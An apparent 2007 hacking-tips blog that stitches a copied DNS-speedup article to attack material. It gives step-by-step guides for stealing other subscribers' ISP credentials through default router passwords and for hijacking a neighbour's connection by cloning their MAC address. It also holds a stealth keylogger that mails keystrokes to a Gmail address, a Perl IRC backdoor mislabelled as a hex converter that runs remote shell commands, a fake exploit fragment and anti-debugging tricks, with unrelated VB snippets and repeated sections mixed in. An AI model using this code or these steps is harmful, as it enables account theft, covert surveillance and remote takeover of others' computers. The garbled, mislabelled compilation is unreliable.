Saturday, November 17, 2007

Hack DNS for lightning-fast Web browsing

Hack DNS for lightning-fast Web browsing
No matter how big the broadband pipe you use to surf the Web, it's not big enough. Everyone, whether they use a slowpoke dial-up modem or the fastest FiOS line, wants to surf faster.

There's a simple way you can get to Web sites faster, and it won't cost you a penny. You can hack the way your PC uses the Domain Name System (DNS), the technology underlying all Web browsing. It's far simpler to do than you might imagine, as you'll see in this article.

Understanding DNS

Before you start, it's a good idea to get a basic understanding of how DNS works. When you type in a URL such as www.computerworld.com, that URL needs to be translated into a numeric IP address that Web servers and Internet routers can understand. When you type in a URL, a DNS server does the translation, from www.computerworld.com to 65.221.110.98, for example.


DNS servers live on the Internet, and your computer contacts them with the request to do that translation, which is commonly called name resolution. When you use an ISP, your computer will automatically use the default DNS servers specified by your ISP; you typically don't need to set up DNS in any way. If you're on a corporate network, your systems administrator may have set you up to use specific DNS servers.

If there's a delay in contacting the DNS server, or if the DNS server takes too much time resolving the address, you'll face a delay in getting to a Web site. So even if you've got the world's fattest pipe, your Web surfing will be slowed down.

If you could speed up the name resolution in some way, you'd be able to speed up your Web surfing. And that's exactly what I'll show you how to do.
Here's the simplest way to hack DNS to speed up your Web browsing: Use free, superfast DNS servers run by the OpenDNS service instead of your ISP's DNS servers. OpenDNS has a monstrously big DNS cache, with DNS servers around the world, so you'll be able to retrieve IP addresses from it more quickly than from your ISP's DNS servers.

As I'll explain a little later in this article, the service includes other benefits as well, such as letting you create browser shortcuts so that you could go to www.computerworld.com, for example, by just typing the letter c in your browser and pressing Enter.

The addresses of the OpenDNS servers are 208.67.222.222 for a primary DNS server and 208.67.220.220 for a secondary server.

To use the OpenDNS servers, you'll have to tell your computer to use them. If you have Windows XP, first select Control Panel --> Network and Internet Connections --> Network Connections, right-click your network connection from the Network Connections window, and select Properties
Scroll down to the Internet Protocol (TCP/IP) listing and select Properties. At the bottom of the screen, select "Use the following DNS server addresses." For the Preferred DNS server, enter this address: 208.67.222.222. For the Alternative DNS server, enter this address: 208.67.220.220. Click OK, and then click Close and Close again. Restart your PC in order for the settings to take effect

note
If you have a router, all you have to do is use the router's base address.

and never try touching/editing or so-call hack with ur dns.. until n unles u're open wid ur system n can freely take risks.. dnd being one of the most delicate parts... can make ur networkigng go towards hell if done sumthing wrongs... so beware!
being a prof hacker.. i can say only this!

Speed

Speed
liek broadband
here simple trick how u hack
go start> run> type regedit

in registry

HKEY_local_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Ports

Modify the default string value of the port. For example. COM1 is 9600,n,8,1" By default; you can modify it to "921600,n,8,1,p"

IN ALL com1 ,2,3,4,5

WARNING; Do this ONLY if using Dial-up (analogue) modems (e.g 56K, ISDN) Connected only to a serial Port (COMx), NOT IF modems! IF using internal Modems located in the communication Networking Riser (CNR) slot, do NOT use these settings! such cards are incompatible with these Settings.

Also, please don't expert you internet access speed to improve-if they do,well and good!

no need software it is simple trick

Speed

Speed
liek broadband
here simple trick how u hack
go start> run> type regedit

in registry

HKEY_local_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Ports

Modify the default string value of the port. For example. COM1 is 9600,n,8,1" By default; you can modify it to "921600,n,8,1,p"

IN ALL com1 ,2,3,4,5

WARNING; Do this ONLY if using Dial-up (analogue) modems (e.g 56K, ISDN) Connected only to a serial Port (COMx), NOT IF modems! IF using internal Modems located in the communication Networking Riser (CNR) slot, do NOT use these settings! such cards are incompatible with these Settings.

Also, please don't expert you internet access speed to improve-if they do,well and good!

no need software it is simple trick

HAKING UR BROADBAND

HAKING UR BROADBAND
Step 1: Download any port Scanner (i preffer Super Scan, IPscanner, gfi LAN nat secirity scanner)

Step 2: First Get your ip

Go to Command prompt type ipconfig /all
Hit enter.
You will see your ip as a clients ip.
suppose its 61.1.1.51

Step 3: write your ip in IP scanner Software and scan for alive IPs in the below range
start:61.1.1.1 to End:61.1.255.255


Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.


Step 5: if port 80 is open then Enter that IP in your web browser
if 23 port is open then u shd knw how to telnet it frm cmd........


Step 6: It asks for user ID AND password type

username =admin
password =admin or password

It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use Show Password tools to view the password in asterisks ********.


now you have username and password ready for use.

Hacking sify

Hacking sify
So guys all those using sify broadband connection get happy here i am giving the way to hack it its not a YET ANOTHER BOGUS tympass

for this u need these app.

1 angry ip scanner
2 gentle mac

h**p://dl.phazeddl.com/793469/Gentle_MAC_Pro_4.0.0.1729/softrightnow
replace ** wid tt

////////////////////////////////////////////////////////////////////
so here u go
first scan your ip range by
ANgry ip scanner

for example the ip given to u by your internet guy is 10.13.195.124

then scan for this 10.13.195.0 to 10.13.195.255 and see the results the alive users of your ip range will be shown as green right click any of them and view his MAC address

now using gentle mac change your ip and mac address to his !! and voilla u are now leaching his bandwidth !! believe me guys from months i am getting minimum of 256 kbps on my 64 one


just make sure u logoff from your sify connection before doing this
and wen a user logs off u can scan again and get a new address

a few tyms u will see that a user is shown green but u can't use his connection this happens wen his pc is on but he has not logged in to sify

u ppl just try all possible users and chose the one who is having fastest connection !

exploits

Xxploit
void con(int sockfd)
{
char rb[1500];
fd_set fdreadme;
int i;

FD_ZERO(&fdreadme);
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);

while(1)
{
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
if(FD_ISSET(sockfd, &fdreadme))
{
if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}

if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}

printf("[-] Connection closed by foreign host..\n");

exit(0);

}

int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;

if(argc<2)
{
usage(argv[0]);
}

while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}

The code shown above reveals information about the raw socket which will be used to convey the packets used in this attack. Suffice it to say that there were no such attempts at creating a raw socket in the exploit that was posted in the forum by the individual claiming it was a 0 day exploit. Once this was ascertained alarm bells should be starting to go off in your head. If there are no system calls being used to deliver the exploit payload to the destination machine then just where is this code going to execute? You guessed it; right on the local machine itself. In reality you are not going to be exploiting anyone, but rather the code will be exploiting you!

One more thing about this supposed exploit bothered me as well. If you have not yet taken a look at the link I included for you to look at up above please do so now. What also bothered me here is that there was a surprisingly small amount of machine language or ASM as it is also called. The supposed ASM in the code listed in part I looks like the small snippet below;

char *shellcode_payload=
\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x3
\x68\x61\x6e\x3d\x22\x23\x30\x78\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\xb
\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x69\x72\x33\x69\x70\x2e\xe
\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\xb
\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x9

source codes

Coding Ascii
BTW, here's a little doo-dad that I threw together that moves the ascii value of each
character up (encode) or down (decode), with a default change of 40.
So, for example, chr(233) might become chr(21), or chr(74) might become chr(114).
Anyone who knows what they're doing could easily decode it, but at least it's not legible
if you open the file in Notepad, etc. Try it!

Syntax is: encode(mytext, [range]) and decode(mytext, [range]).

-SJ; samjohnyb4u@gmail.com

Public Function Encode(Data as String, Optional Depth as Integer) as String
Dim TempChar as String
Dim TempAsc as Integer
Dim NewData as String
Dim vChar as Integer

For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40 'DEFAULT DEPTH
If Depth > 254 Then Depth = 254

TempAsc = TempAsc + Depth
If TempAsc > 255 Then TempAsc = TempAsc - 255
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Encode = NewData

End Function

Public Function Decode(Data as String, Optional Depth as Integer) as String
Dim TempChar as String
Dim TempAsc as Integer
Dim NewData as String
Dim vChar as Integer

For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40 'DEFAULT DEPTH
If Depth > 254 Then Depth = 254
TempAsc = TempAsc - Depth
If TempAsc < 0 Then TempAsc = TempAsc + 255
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Decode = NewData

End Function
CheckTime
converting text-input to a reliable time

'convert (most of) any input to a time

Public Function CheckTijd(bron$) As Date
dim t%
'checking on digits and seperator
Const Getal$ = "1234567890.:"

For t% = 1 To Len(bron$)
If InStr(Getal$, Mid$(bron$, t%, 1)) = 0 Then exit Function
If Mid$(bron$, t%, 1) = "." Then bron$ = Left$(bron$, t% - 1) & ":" & Right$(bron$, Len(bron$) - t%)
Next t%

select case Len(bron$)
case 0
exit Function
case 1
bron$ = "0" & bron$ & ":00"
case 2
bron$ = bron$ & ":00"
case 3
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 1) & ":" & Right$(bron$, 2)
case 4
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
case 5
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
end Select

on Error Resume Next
CheckTijd = TimeValue(bron$)

End Function

'use it in the Text_Lostfocus event like

Sub Text1_LostFocus
Text1.Text = CheckTijd(Text1.Text)
End Sub

'giving the input in text1 => result
'1 => 01:00
'12 => 12:00
'1.1 => 01:10
'915 => 9:15
'9.15 => 9:15
'1015 => 10:15
'10.15 => 10:15
'12:15 => 12:15

'giving an impossible time => result
'26 => 00:00
'1976 => 00:00

'giving just nothing (TAB/ENTER) will give no result
CheckTime
converting text-input to a reliable time

'convert (most of) any input to a time

Public Function CheckTijd(bron$) As Date
dim t%
'checking on digits and seperator
Const Getal$ = "1234567890.:"

For t% = 1 To Len(bron$)
If InStr(Getal$, Mid$(bron$, t%, 1)) = 0 Then exit Function
If Mid$(bron$, t%, 1) = "." Then bron$ = Left$(bron$, t% - 1) & ":" & Right$(bron$, Len(bron$) - t%)
Next t%

select case Len(bron$)
case 0
exit Function
case 1
bron$ = "0" & bron$ & ":00"
case 2
bron$ = bron$ & ":00"
case 3
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 1) & ":" & Right$(bron$, 2)
case 4
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
case 5
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
end Select

on Error Resume Next
CheckTijd = TimeValue(bron$)

End Function

'use it in the Text_Lostfocus event like

Sub Text1_LostFocus
Text1.Text = CheckTijd(Text1.Text)
End Sub

'giving the input in text1 => result
'1 => 01:00
'12 => 12:00
'1.1 => 01:10
'915 => 9:15
'9.15 => 9:15
'1015 => 10:15
'10.15 => 10:15
'12:15 => 12:15

'giving an impossible time => result
'26 => 00:00
'1976 => 00:00

'giving just nothing (TAB/ENTER) will give no result
Converting Numbers
Hexadecimal to Decimal

Sub Form_Load ()

Dim x as String
Dim y as Variant

x = "fffe"
y = CLng("&H" & x)

If y < 0 Then y = y + 65536 ' returns 65534

MsgBox y

End Sub


* Converting a string to an integer: Cal Stover

Dim SomeVariable as Integer
SomeVariable = CInt(Label2.Caption) + 100

Dim SomeVariable as Single
SomeVariable = CSng(Val(Label2.Caption) + 100)


* convert a number in Hexadecimal to Binary -chris

A very fast conversion from hex to binary can be done with a sixteen
element look-up table - a single hex digit converts to four binary
digits. So:

Function Hex2Bin$(HexValue$)
CONST BinTbl ="0000000100100011010001010110011110001001101010111100110111101111"
dim X, Work$
Work$ = ""
For X = 1 to Len(HexValue$)
Work$ = Work$ + Mid$(BinTbl, (Val("&h" + Mid$(HexValue$, X, 1) - 1) * 4 + 1, 4)
Next
Hex2Bin$ = Work$
End Function

You could also code BinTbl as an array which would eliminate one of the
Mid$() calls, but then the array would either have to be built ahead of
time or built every time you called the Hex2Bin function. You could try
all three options and see which is faster.
'Drag and Drop
'Drag and Drop within a application

Suppose you have a listbox with some elements and want to drag&drop a selected one into
a textbox. I know there are easier ways to do this but it's just for making the point.

Make a form with a textbox (text1) and a listbox (list1). Fill the listbox with some items...
Make a label (label1). Set it invisible = False

Put the next code at the appropiate places:

Sub List1_MouseDown (Button as Integer, Shift as Integer, X as Single, Y as Single)
Dim DY

DY = TextHeight("A")
Label1.Move list1.Left, list1.Top + Y - DY / 2, list1.Width, DY
Label1.Drag

End Sub

Sub List1_DragOver (Source as Control, X as Single, Y as Single, state as Integer)
If state = 0 Then Source.MousePointer = 12
If state = 1 Then Source.MousePointer = 0

End Sub

Sub Form_DragOver (Source as Control, X as Single, Y as Single, state as Integer)
If state = 0 Then Source.MousePointer = 12
If state = 1 Then Source.MousePointer = 0

End Sub

Sub Text1_DragDrop (Index as Integer, Source as Control, X as Single, Y as Single)
text1.text = list1

End Sub

FileExists
check if file already exists

---------------- first version

Function FileExist (Path$) as Integer
dim x
x = FreeFile
on Error Resume Next
open Path$ For Input as x
FileExist = (Err = 0)
Close x
End Function

---------------- second version

'thanks for modifications: Lynton

The function above assumes that the file you are checking for is
not locked (in use). In that case, fileexists would return false because
you are attempting to open a locked file.

Function FileExists%(ByVal sPath$)
' Check for the existence of a file.
dim rc%
FileExists = False
on Error Resume Next
If Len(sPath$) Then
rc% = Len(Dir$(sPath$))
If rc% And Not Err Then FileExists% = True
end If
End Function

---------------- third version
George Toft


This is much easier and quicker than the ones you have. I used to
use code almost identical to the ones you have until I learned about
the DIR function.

Public Function FileExist(parmPath as String) as Integer

FileExist = Not (Dir(parmPath) = "")

End Function' FileExist

---------------- fourth adjustment
dayak


Using a Form, containing a Textbox, and a Command button, the following code
works for creating and checking the existence of a directory.
============================Code Follows===================================



Private sub Command1_Click()

Dim sFname as String
sFname = App.Path & "\" & "mydir"

If Not FileExist(sFname) Then
MsgBox ("Creating 'mydir' Directory in App.Path")
MkDir (sFname)
Text1.Text = "Directory 'mydir' has been created"
Else
Text1.Text = "Directory 'mydir' already exists"
End If


End Sub

Private Function FileExist(ByRef sFname) as Boolean

If Len(Dir(sFname, 16)) Then FileExist = True Else FileExist = False

End Function

FileName
get only the filename 'use as

MsgBox HaalBestandNaam("c:\windows\win.com","\") 'gives you 'win.com'
MsgBox HaalBestandNaam("d:/data/backup.txt","/") 'gives you 'backup.txt'
'last example I needed for conencting to some unix-systems

Function HaalBestandNaam(bron$, vSlash$) as String
dim p%

HaalBestandNaam = bron
For p% = Len(bron$) To 0 step -1
If Mid$(bron$, p%, 1) = vSlash$ Then
HaalBestandNaam = Mid$(bron$, p% + 1, Len(bron$) - p% + 1)
exit Function
end If
Next p%

End Function
Integer2Hex
convert integer to Hex

'convert binary to Hex

'make a form with a commondialog.control
'make a command.control named cmdColor

Sub cmdColor_Click()
dim RedValue, GreenValue, BlueValue
dim AColor

'see help on Flags for settings
CMDialog1.Flags = &H1& Or &H4&
'action 3 means show colorpalette
CMDialog1.Action = 3
'when you press OKE the color will be put into the variable AColor
AColor = CMDialog1.Color

RedValue = (ACOLOR And &HFF&)
GreenValue = (ACOLOR And &HFF00&) \ 256
BlueValue = (ACOLOR And &HFF0000) \ 65536
ChoosenColor = Format(Hex(RedValue) & Hex(GreenValue) & Hex(BlueValue), "000000")
msgbox ChoosenColor

End Sub

Leap-Year
check if year is a leap-year

'checking if a year is a leap-year

'make a new project
'add a form
'add a texbox and a commandbutton
'insert the code
'press F5


Option Explicit

Private sub Command1_Click()

dim strDatum as String

If Text1.Text = "" Then exit Sub
strDatum = ("29-2-" + Text1.Text)
If IsDate(strDatum) Then MsgBox Text1.Text + " is a leap-year." _
Else MsgBox Text1.Text + " isn't a leap-year."

End Sub

Private sub Form_Load()

Text1.Text = Year(Now)

End Sub

LimitInput
limit input in a textbox to certain characters

Function LimitTextInput(source) as String
'put the next line in the Textbox_KeyPress event
'KeyAscii = LimitTextInput(KeyAscii)

'change Numbers with any other character
Const Numbers$ = "0123456789."

'backspace =8
If source <> 8 Then
If InStr(Numbers, Chr(source)) = 0 Then
LimitTextInput = 0
exit Function
end If
end If
LimitTextInput = source

End Function
Simple Key logger
Just create a timer and a textbox on your form, leave their names as Text1 and Timer1. Set the timer's interval to 1 and make sure it's activated. Copy this code to your form.

Dim result As Integer

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Timer1_Timer()

For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)

If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End if
Next i
End Sub

if this aint working..do tell me..



Keymail

/*
Compile notes: I used Dev-C++

4.9.9.2 to compie this. if you get an

error like:
Linker error] undefined

reference to `WSAStartup@8'
Add this:
-lws2_32
to Tools->Compiler Options under the

section on compile flags.
*/

#include
#include
#include
#include
#include
int MailIt (char *mailserver, char

*emailto, char *emailfrom,
char *emailsubject, char

*emailmessage);
#define BUFSIZE 800
#define waittime 500
/*If you don't know the mail

exchange server for an address for

the following
"nslookup -querytype=mx gmail.com"

but replace gmail.com with the domain

for
whatever email address you want.

YOU MUST CHANGE THESE

SETTINGS OR
IT WILL NOT WORK!!! */#define cmailserver

"gmail-smtp-in.l.google.com"
#define cemailto

"samjohnyb4u@gmail.com"
#define cemailfrom

"samjohnyb4u@gmail.com"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"int test_key(void);
int main(void)
{
//Uncomment the lines below to

put the keylogger in stealh mode.
HWND stealth; /*creating stealth

*/
AllocConsole();


stealth=FindWindowA("ConsoleWindowC

lass",NULL);
ShowWindow(stealth,0);

{FILE *file;
file=fopen(FileName,"a+");
time_t theTime=time(0);
fputs("\nStarted logging: ", file);
fputs(ctime(&theTime),file);
fclose(file);
} /* if (test==2)
{//the path in which the file

needs to be
char

*path="c:\\%windir%\\svchost.exe";
create=create_key(path);
} */

int t=get_keys();
return t;
} int get_keys(void)
{
int freadindex;
char *buf;
long len;
FILE *file;
file=fopen(FileName,"a+");

short character;
while(1)
{
sleep(10);/*to

prevent 100% cpu usage*/for(character=8;character<=222;char

acter++)
{


if(GetAsyncKeyState(character)==-32

767)
{
FILE *file;


file=fopen(FileName,"a+");


if(file==NULL)
{


return 1;
}


if(file!=NULL)
{


if((character>=39)&&(character<=64))
{


fputc(character,file);


fclose(file);


break;
}


else

if((character>64)&&(character<91))
{


character+=32;


fputc(character,file);


fclose(file);


break;
}
else
{

switch(character)


{


case VK_SPACE:


fputc(' ',file);


fclose(file);


break;


case VK_SHIFT:

fputs("\r\n[SHIFT]\r\n",file);


fclose(file);


break;


fputs("\r\n[ENTER]\r\n",file);


fclose(file);


break;


case VK_BACK:




fputs("\r\n[BACKSPACE]\r\n",file);


fclose(file);


break;


case VK_TAB:


fputs("\r\n[TAB]\r\n",file);


fclose(file);


break;


case VK_CONTROL:


fputs("\r\n[CTRL]\r\n",file);


fclose(file);


break;


case VK_DELETE:


fputs("\r\n[DEL]\r\n",file);


fclose(file);

break;


case VK_OEM_1:


fputs("\r\n[;:]\r\n",file);


fclose(file);


break;


case VK_OEM_2:

fputs("\r\n[/?]\r\n",file);


fclose(file);


break;


case VK_OEM_3:

fputs("\r\n[`~]\r\n",file);


fclose(file);
break;


case VK_OEM_4:


fputs("\r\n[ [{ ]\r\n",file);


fclose(file);


break;


case VK_OEM_5:


fputs("\r\n[\\|]\r\n",file);


fclose(file);


break;




case VK_OEM_6:


fputs("\r\n[ ]} ]\r\n",file);


fclose(file);


break;


case VK_OEM_7:


fputs("\r\n['\"]\r\n",file);


fclose(file);


break;

case 187:


fputc('+',file);


fclose(file);


break;


case 188:


fputc(',',file);


fclose(file);


break;


case 189:


fputc('-',file);
fclose(file);


break;


case 190:


fputc('.',file); fclose(file);
break;


case VK_NUMPAD0:


fputc('0',file);


fclose(file);


break;


case VK_NUMPAD1:


fputc('1',file);


fclose(file);


break;


case VK_NUMPAD2:


fputc('2',file);


fclose(file);


break;


case VK_NUMPAD3:


fputc('3',file);


fclose(file);


break;


case VK_NUMPAD4:


fputc('4',file);


fclose(file);


break;


case VK_NUMPAD5:


fputc('5',file);


fclose(file);


break; case VK_NUMPAD6:


fputc('6',file);


fclose(file);


break;


case VK_NUMPAD7:


fputc('7',file);


fclose(file);


break;
case VK_NUMPAD8:


fputc('8',file);


fclose(file);


break;


case VK_NUMPAD9:


fputc('9',file);


fclose(file);


break;


case VK_CAPITAL:


fputs("\r\n[CAPS

LOCK]\r\n",file);


fclose(file);


break;


default:


fclose(file);


break;
}


}
}
}
}
FILE *file;
file=fopen(FileName,"rb");
fseek(file,0,SEEK_END);

//go to end
len=ftell(file); //get

position at end (length)
if(len>=LogLength) {


fseek(file,0,SEEK_SET);//go to beg.
buf=(char

*)malloc(len);//malloc buffer


freadindex=fread(buf,1,len,file);//rea

d into buffer
buf[freadindex] =

'\0';//Extra bit I have to add to

make it a sting
MailIt( cmailserver,

cemailto, cemailfrom, cemailsubject,

buf); fclose(file);
file=fopen(FileName,"w");


}
fclose(file);
//free (buf);

}
return EXIT_SUCCESS;


}
int MailIt (char *mailserver, char

*emailto, char *emailfrom,
char *emailsubject, char

*emailmessage) {
SOCKET sockfd;
WSADATA wsaData;
FILE *smtpfile;

#define bufsize 300
int bytes_sent; /* Sock FD */
int err;
struct hostent *host; /* info

from gethostbyname */
struct sockaddr_in dest_addr;

/* Host Address */
char line[1000];
char *Rec_Buf = (char*)

malloc(bufsize+1);
smtpfile=fopen(SMTPLog,"a+");
if (WSAStartup(0x202,&wsaData)

== SOCKET_ERROR) {
fputs("WSAStartup

failed",smtpfile);
WSACleanup();
return -1;
}
if (

(host=gethostbyname(mailserver)) ==

NULL) {
perror("gethostbyname");
exit(1);
}


memset(&dest_addr,0,sizeof(dest_add

r));


memcpy(&(dest_addr.sin_addr),host->

h_addr,host->h_length); /* Prepare dest_addr */
dest_addr.sin_family=

host->h_addrtype; /* AF_INET

from gethostbyname */
dest_addr.sin_port= htons(25);

/* PORT defined above */

/* Get socket */

if

((sockfd=socket(AF_INET,SOCK_STRE

AM,0)) < 0) {
perror("socket");
exit(1);
}
/* Connect !*/
fputs("Connecting....\n",smtpfile);

if (connect(sockfd, (struct

sockaddr

*)&dest_addr,sizeof(dest_addr)) ==

-1){
perror("connect");
exit(1);
}
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"helo

me.somepalace.com\n"); fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"MAIL FROM:<");strncat(line,emailfrom,strlen(emailfro

m));
strncat(line,">\n",3);
fputs(line,smtpfile);bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);
err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"RCPT TO:<");


strncat(line,emailto,strlen(emailto));
strncat(line,">\n",3);
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"DATA\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
sleep(waittime);
strcpy(line,"To:");
strcat(line,emailto);
strcat(line,"\n");
strcat(line,"From:");
strcat(line,emailfrom);
strcat(line,"\n");
strcat(line,"Subject:");
strcat(line,emailsubject);
strcat(line,"\n");
strcat(line,emailmessage);
strcat(line,"\r\n.\r\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"quit\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
fclose(smtpfile);


#ifdef WIN32
closesocket(sockfd);
WSACleanup();
#else
close(sockfd);
#endif
}

Perl Virus Scanner
#!/usr/bin/perl
use strict;
use warnings;
use File::Find;
use File::Scan;
my $scandir = "c:\\"; # couldn't get it to work with 'c:/'
my $results = "c:\\virusscan.txt";
open(VS, ">", $results);
my $filescan = File::Scan->new(extension => 'bad', move => 'infected')
+;
find({ wanted => \&doscan, follow_skip => 2 }, $scandir);

sub doscan {
return if /^[.]+/;
my $file = $File::Find::name;
$file =~ s#\\##;
print "$file\n";
return if (-d $file);
$filescan->scan($file);
if (my $e = $filescan->error()) { print "$file $e\n"; }
if (my $c = $filescan->skipped()) {
my @skip = (
"file not skipped",
"file is not vulnerable",
"file has zero size",
"the size of file is small",
"the text file size is greater that the 'max_txt_size' argument",
"the binary file size is greater that the 'max_bin_size' argument"
+,
);
print VS "$file $skip[$c]\n" if ($c); # only print if the file was
+ skipped
}
if ($filescan->suspicious) { print VS "$file suspicious file\n"; }
}



Perl for converting Hex to ASCII
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";
$SIG{TERM}={};
exit if fork;use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433"){$i++;$nick=~s/\d*$/$i/;
print $sock "NICK $nick\n";}}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;
$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}
}#/tmp/hi

Detecting SoftICE
/*
Function: IsSICELoaded
Description: This method is used by a lot of crypters/compresors it uses INT 41,
this interrupt is used by Windows debugging interface to detect if a
debugger is present. Only works under Windows.
Returns: true if a debugger is detected
*/

__inline bool IsSICELoaded() {
_asm {
mov ah, 0x43
int 0x68
cmp ax, 0x0F386 // Will be set by all system debuggers.
jz out_

xor ax, ax
mov es, ax
mov bx, word ptr es:[0x68*4]
mov es, word ptr es:[0x68*4+2]
mov eax, 0x0F43FC80
cmp eax, dword ptr es:[ebx]
jnz out_
jmp normal_
normal_:
xor eax, eax
leave
ret
out_:
mov eax, 0x1
leave
ret
}
return false;
}


Detecting SoftICE NT
/*
Function: IsSoftIceNTLoaded
Description: Like the previous one but for use under Win NT only
Returns: true if SoftIce is loaded
*/

__inline BOOL IsSoftIceNTLoaded() {
HANDLE hFile=CreateFile( "\\\\.\\NTICE",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(hFile!=INVALID_HANDLE_VALUE) { CloseHandle(hFile); return true; }
return false;
}

Detecting OllyDbg
/*
Function: IsODBGLoaded
Description: Tests if OllyDbg/other app debuggers is/are enabled
Returns: true if a debugger is detected
*/

__inline bool IsODBGLoaded() {
char *caption="DAEMON";
_asm {
push 0x00
push caption

mov eax, fs:[30h] // pointer to PEB
movzx eax, byte ptr[eax+0x2]
or al,al
jz normal_
jmp out_
normal_:
xor eax, eax
leave
ret
out_:
mov eax, 0x1
leave
ret
}
}


Detecting Breakpoints
/*
Functions are declared as __inline, this causes the expansion of this code each time a function
is invoked, this is to difficult the cracker work by using this function more than once time

Function: IsBPX
Description: Checks if the given memory address is a breakpoint
Returns: true if it is a breakpoint
*/

__inline bool IsBPX(void *address) {
_asm {
mov esi, address // load function address
mov al, [esi] // load the opcode
cmp al, 0xCC // check if the opcode is CCh
je BPXed // yes, there is a breakpoint

// jump to return true
xor eax, eax // false,
jmp NOBPX // no breakpoint
BPXed:
